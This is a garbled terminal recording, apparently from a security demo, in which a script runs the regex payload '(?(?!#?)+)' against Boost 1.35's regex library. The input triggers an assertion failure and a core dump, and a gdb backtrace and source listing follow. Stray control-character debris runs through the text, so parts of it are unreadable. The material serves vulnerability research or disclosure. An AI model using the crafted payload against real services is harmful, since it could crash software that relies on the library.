G: user@vapor|0; G*pG<wGdG. G/demos/boost G`: user@vapor|0; G- sG} oG2uGbrGcG eG Gw .G .GE/Gs{dGkeGmG>os.sh G@  Gm& : demo@vapor|0; GH hG6aGnGٲ dle_product Gh G00. NULL Dereference 01. Out of band read+ select vulnerability: G 1G! GSIOut of band read+ selected. payload: (?(?!#?)+) press enter to run. G.  G4 [1] 4506 G{ tester: /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376: bool boost::re_detail::perl_matcher::match_startmark() [with BidiIterator = const char*, Allocator = std::allocator >, traits = boost::regex_traits >]: Assertion `pstate->type == syntax_element_startmark' failed. G,`../demos.sh: line 80: 4508 Aborted (core dumped) ./tester <<(echo "$payload") G&}-[1]+ Exit 134 ( eval $cmd ) GCore file generated. GʕOpening gdb ... GI IUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". GI warning: G5Can't read pathname for load map: Input/output error.G G3cReading symbols from /usr/local/encap/boost-1198084281/lib/libboost_regex-gcc40-d-1_35.so.1.35.0...G1done. Gp`Loaded symbols for /usr/local/encap/boost-1198084281/lib/libboost_regex-gcc40-d-1_35.so.1.35.0 GE/Reading symbols from /usr/lib/libstdc++.so.6...Gdone. GH,Loaded symbols for /usr/lib/libstdc++.so.6 G(4Reading symbols from /lib/tls/i686/cmov/libm.so.6...GFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libm-2.3.6.so...Gdone. Gdone. Gp1Loaded symbols for /lib/tls/i686/cmov/libm.so.6 G*Reading symbols from /lib/libgcc_s.so.1...G|done. G'Loaded symbols for /lib/libgcc_s.so.1 G4Reading symbols from /lib/tls/i686/cmov/libc.so.6...GH&FReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...Gadone. Gzbdone. Gb1Loaded symbols for /lib/tls/i686/cmov/libc.so.6 Gc1Reading symbols from /usr/lib/libicui18n.so.34...G6done. Gڠ.Loaded symbols for /usr/lib/libicui18n.so.34 G/Reading symbols from /usr/lib/libicuuc.so.34...Gdone. G%,Loaded symbols for /usr/lib/libicuuc.so.34 G*Reading symbols from /lib/ld-linux.so.2...Gy6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...Gdone. Gydone. G'Loaded symbols for /lib/ld-linux.so.2 G1Reading symbols from /usr/lib/libicudata.so.34...G warning: G@Lowest section in /usr/lib/libicudata.so.34 is .hash at 4322d094G  Gsdone. G.Loaded symbols for /usr/lib/libicudata.so.34 G:Reading symbols from /lib/tls/i686/cmov/libpthread.so.0...GbLReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libpthread-2.3.6.so...Gdone. Godone. G7Loaded symbols for /lib/tls/i686/cmov/libpthread.so.0 GK#Core was generated by `./tester'. G,Program terminated with signal 6, Aborted. Gh(#0 0xffffe402 in __kernel_vsyscall () G>>GgbG?tGe G^u#0 0xffffe402 in __kernel_vsyscall () #1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6 #2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6 #3 0x43b36f51 in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 GO#4 0x08058e9d in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_startmark (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376 #5 0x080571f5 in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_all_states (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:161 #6 0x080573af in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_prefix (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:310 #7 0x080578aa in boost::re_detail::perl_matcher >, boost::regex_traits > >::find_restart_any (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:786 #8 0x08056b34 in boost::re_detail::perl_matcher >, boost::regex_traits > >::find_imp (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_common.hpp:287 G#9 0xf7f98ccd in boost::re_detail::perl_matcher >, boost::regex_traits > >::find (this=0xffffb26c) at ./boost/regex/v4/perl_matcher_common.hpp:218 G##10 0x08053c62 in boost::regex_search > > (first=0xffffb374 "(?(?!#?)+)", last=0xffffb37e "", e=@0xffffd374, flags=boost::regex_constants::match_default) Gha at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/regex_search.hpp:138 GM#11 0x08053d15 in boost::regex_search > > (str=0xffffb374 "(?(?!#?)+)", e=@0xffffd374, flags=boost::regex_constants::match_default) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/regex_search.hpp:148 GD#12 0x08050d9d in main (argc=0x1, argv=0xffffd414) at tester.cc:30 G>>GuGBpGf G4G) G,~#4 0x08058e9d in boost::re_detail::perl_matcher >, boost::regex_traits > >::match_startmark (this=0xffffb26c) at /usr/local/encap/boost-1198084281/include/boost-1_35/boost/regex/v4/perl_matcher_non_recursive.hpp:376 376 BOOST_ASSERT(pstate->type == syntax_element_startmark); GO->>G pG7  G pG;sG/tG aGPtGeGD-GJ>G >tG yGv pG| eGӫ GS)$1 = boost::re_detail::syntax_element_repG G2>>G pG`  GJ*G% G pGw sGNtGiaGtGeG G[$2 = {type = boost::re_detail::syntax_element_rep, next = {p = 0x805d584, i = 0x805d584}} GO>>GX lG&  Gx( 371 break; 372 } 373 else 374 { 375 // zero width assertion, have to match this recursively: 376 BOOST_ASSERT(pstate->type == syntax_element_startmark); 377 bool negated = static_cast(pstate)->index == -2; 378 BidiIterator saved_position = position; 379 const re_syntax_base* next_pstate = static_cast(pstate->next.p)->alt.p->next.p; 380 pstate = pstate->next.p->next.p; G( >>GlG&  G( 381 bool r = match_all_states(); 382 position = saved_position; 383 if(negated) 384 r = !r; 385 if(r) 386 pstate = next_pstate; 387 else 388 pstate = alt->alt.p; 389 break; 390 } G( >>G. lG05 G60391 } 392 default: 393 { 394 BOOST_ASSERT(index > 0); 395 if((m_match_flags & match_nosubs) == 0) 396 { 397 push_matched_paren(index, (*m_presult)[index]); 398 m_presult->set_first(position, index); 399 } 400 pstate = pstate->next.p; G6>>GT=qG* Gi: demo@vapor|0; G!exit